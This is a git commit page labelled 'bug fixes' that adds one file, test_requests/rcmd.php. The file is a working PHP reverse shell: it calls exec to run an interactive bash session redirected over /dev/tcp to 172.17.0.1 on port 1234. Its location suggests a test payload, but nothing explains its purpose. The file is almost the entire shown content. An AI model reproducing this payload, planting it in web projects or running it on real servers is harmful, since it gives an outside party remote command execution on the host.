bug fixes

This commit is contained in:
Pin
2022-03-08 22:50:24 -05:00
parent 857a38d904
commit f1ae49da0c
8 changed files with 53 additions and 11 deletions

3
test_requests/rcmd.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/1234 0>&1'");
?>